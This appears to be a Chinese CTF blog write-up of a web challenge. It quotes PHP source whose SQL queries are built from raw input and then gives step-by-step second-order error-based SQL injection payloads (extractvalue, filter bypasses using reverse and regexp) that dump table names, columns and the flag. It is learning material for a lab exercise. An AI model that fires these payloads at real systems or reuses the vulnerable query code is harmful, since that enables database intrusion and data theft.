先查看源码
1,changepwd(修改密码)
<?php
// 开启会话,以便使用会话变量
session_start();// 设置页面的内容类型为 HTML 并使用 UTF-8 编码
header("Content-Type: text/html; charset=UTF-8");// 引入配置文件,通常包含数据库连接信息等
require_once 'config.php';// 输出一个表单,用于用户输入旧密码和新密码
echo '<form action="" method="post"><p>oldpass: <input type="text" name="oldpass" /></p><p>newpass: <input type="text" name="newpass" /></p><input type="submit" value="Submit" /></form>';// 检查是否提交了旧密码和新密码
if (isset($_POST['oldpass']) && isset($_POST['newpass'])) {// 将用户输入的旧密码进行 MD5 哈希处理$oldpass = md5($_POST['oldpass']);// 将用户输入的新密码进行 MD5 哈希处理$newpass = md5($_POST['newpass']);// 获取当前登录用户的用户名,存储在会话中$username = $_SESSION['username'];// 构建 SQL 语句,用于更新用户的密码,使用用户输入的旧密码验证用户身份$sql = "update users set pwd='$newpass' where name=\"$username\" and pwd='$oldpass'";// var_dump($sql);// 执行 SQL 查询$query = mysql_query($sql);// 检查查询是否成功执行if ($query) {// 如果查询成功,退出脚本,可根据需要修改为更有意义的操作,如显示成功消息exit('');} else {// 如果查询失败,输出 MySQL 错误信息并终止脚本die(mysql_error());}
}
?>此文件表明会对输入的用户名和密码进行MD5哈希处理
所以数据库中存储的是MD5哈希值
查询成功,此文件执行结束,如果失败,会输出MySQL错误信息
好像是报错注入
2,config(配置文件)
<?php
// 定义数据库主机地址和端口号
$dbhost = 'localhost:3306';
// 定义数据库用户名
$dbuser = 'root';
// 定义数据库密码,这里是空密码
$dbpass = '';
// 使用 mysql_connect 函数尝试连接到数据库服务器,传递主机、用户名和密码作为参数
$conn = mysql_connect($dbhost, $dbuser, $dbpass);// 选择要使用的数据库,这里选择的是名为 'web_sqli' 的数据库
mysql_select_db('web_sqli');
// 设置字符集为 utf8,确保数据库操作使用 utf8 编码,避免乱码问题
mysql_query('set NAMES utf8');// 检查是否开启了魔术引号,如果没有开启,则对 POST 和 GET 数据进行转义处理
if (!get_magic_quotes_gpc()) {// 遍历 POST 数据,对其中的每个元素进行转义处理foreach ($_POST as $key => $value) {// 使用 addslashes 函数对值进行转义,防止 SQL 注入$_POST[$key] = addslashes($value);}// 遍历 GET 数据,对其中的每个元素进行转义处理foreach ($_GET as $key => $value) {// 使用 addslashes 函数对值进行转义,防止 SQL 注入$_GET[$key] = addslashes($value);}
}
?>此文件表明数据库用户名为root,密码是空密码
并且检查是否开启了魔术引号,未开启时对post,get数据进行转义处理
3,index(默认首页文件)
<?php
// 开始一个新的会话或继续已有的会话
session_start();// 设置 HTTP 响应头,指定内容类型为 text/html 且字符编码为 UTF-8
header("Content-Type: text/html; charset=UTF-8");// 引入配置文件,通常包含数据库连接信息等
require_once 'config.php';// 检查是否已经设置了会话中的用户名,这通常表示用户已经登录
if (isset($_SESSION['username'])) {// 输出欢迎信息,并显示用户的名字作为一个链接,指向 user.php 页面echo "Hi,<a href='user.php'>".$_SESSION['username']."</a>";// 输出一个无序列表的开始标签echo "<ul>";// 输出列表项,链接到 index.php 并传递不同的 title 参数echo "<li><a href='index.php?title=lcsg'>良辰诗歌</a></li>";echo "<li><a href='index.php?title=wyzb'>网友装逼</a></li>";echo "<li><a href='index.php?title=zrtbf'>赵日天不服</a></li>";// 输出无序列表的结束标签echo "</ul>";// 检查是否从 GET 请求中接收到了 title 参数if (isset($_GET['title'])) {// 获取 GET 请求中的 title 参数的值$title = $_GET['title'];// 构建一个 SQL 查询语句,根据 title 从 article 表中查询数据$sql = "select * from article where title='$title'";// 执行 SQL 查询$query = mysql_query($sql);// 检查查询是否成功执行if ($query) {// 获取查询结果的一行数据作为关联数组$row = mysql_fetch_array($query);// 输出查询结果中 content 列的数据echo $row['content'];}}
} else {// 如果用户没有登录,输出匿名用户的欢迎信息echo "Hi,Anonymous<br>";// 输出登录页面的链接echo "<a href='./login.php'>LOGIN</a><br>";// 输出注册页面的链接echo "<a href='./register.php'>REGISTER</a><br>";
}
?>
4,login(登录)
<?php
// 开始一个新的会话或继续已有的会话
session_start();// 设置 HTTP 响应头,指定内容类型为 text/html 并使用 UTF-8 编码
header("Content-Type: text/html; charset=UTF-8");// 引入配置文件,通常包含数据库连接信息等
require_once 'config.php';// 输出一个 HTML 表单,用户可以在其中输入用户名和密码,表单提交到 login.php 页面,使用 POST 方法
echo '<form action="login.php" method="post"><p>username: <input type="text" name="username" /></p><p>password: <input type="text" name="password" /></p><input type="submit" value="Submit" /></form>';// 检查是否通过 POST 方法提交了用户名和密码
if (isset($_POST['username']) && isset($_POST['password'])) {// 获取用户输入的用户名$username = $_POST['username'];// 使用 MD5 对用户输入的密码进行哈希处理(这种方式已不安全,建议使用 password_hash 函数)$password = md5($_POST['password']);// 构建 SQL 查询语句,用于从 users 表中查找匹配的用户名和密码$sql = "SELECT * FROM users WHERE name = '$username' and pwd = '$password'";// 执行 SQL 查询$query = mysql_query($sql);// 检查查询结果是否正好有一行(即找到一个匹配的用户)if (mysql_num_rows($query) == 1) {// 获取查询结果的一行数据$row = mysql_fetch_array($query);// 将用户名存储在会话中,用于后续页面判断用户是否已登录$_SESSION['username'] = $row['name'];// 重定向到 index.php 页面header('Location: index.php');// 终止脚本执行die();} else {// 如果未找到匹配用户,输出登录错误信息并终止脚本die('<br>login error');}
}
?>看完这个源码后就看不到了
只能先进靶场了
进入靶场
尝试输入
无效字符串
不管输啥都说无效字符串,,,,,,
后来发现好像是Email出了问题
知道了一个用户名(猜测可以通过新注册一个账号来更改admin账户的密码)
以此来注册一个账号
登录
看到此页面
点击admin#后发现可以更改密码
那就先把admin账号的密码改了
改成123
登录看看
好打脸啊
一开始输admin'说无效字符串后就没输过'了
补上再输一遍
还是错的????????????????????
试试 "
好吧,也是对了,以后菜就多试
先都点进去看看
so,我是什么很贱的人吗,给我看这个
不过通过以上操作,得知存在二次注入
根据源码知道它会报错
而且一开始的操作知道它会过滤
50.【8】BUUCTF WEB HardSql-CSDN博客
参考这篇博客的语句
1,查询库名
admin"^extractvalue(1,concat(0x7e,(select(database()))))#
(#是以get方式提交时使用的,-- -和-- +是以post方式提交时使用的,%23在url处使用)
2,查询表名
admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('~web_sqli'))))#
???
尝试了一下,是把like过滤了
改
admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='~web_sqli')))#
空白???
改
admin"||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)='~web_sqli')))#
还是空白?????????
改
admin"^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())))#
把库名带进去就报不出来,那我求库名的操作算什么????
算我。。
3,查询字段名
admin"^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='flag')))#
4,查询字段内容
admin"^extractvalue(1,concat(0x7e,(select(flag)from(flag))))#
变
admin"^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users')))#
语义未尽
改
用right让后面的爆出来
admin"^extractvalue(1,right(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),32))#
要不我还是去四八(好不容易把括号一组一组对上)
他把right过滤了
改
admin"^extractvalue(1,concat(0x7e,reverse((select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'))))#
终于终于
admin"^extractvalue(1,concat(0x7e,(select(real_flag_1s_here)from(users))))#
???还好还好,快结束了
下午学姐刚好讲了正则表达式
admin"^extractvalue(1,concat(0x7e,(select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f'))))#
admin"^extractvalue(1,concat(0x7e,reverse((select(real_flag_1s_here)from(users)where(real_flag_1s_here)regexp('^f')))))#
手动拼一下
flag{090f0996-0d57-4a30-b0d9-92675185411f}
over
笔记
1,该用字典还得用字典
2,extractvalue
3,空格被过滤的题目第一遍就认真注意()的个数,千万别再多一个少一个了
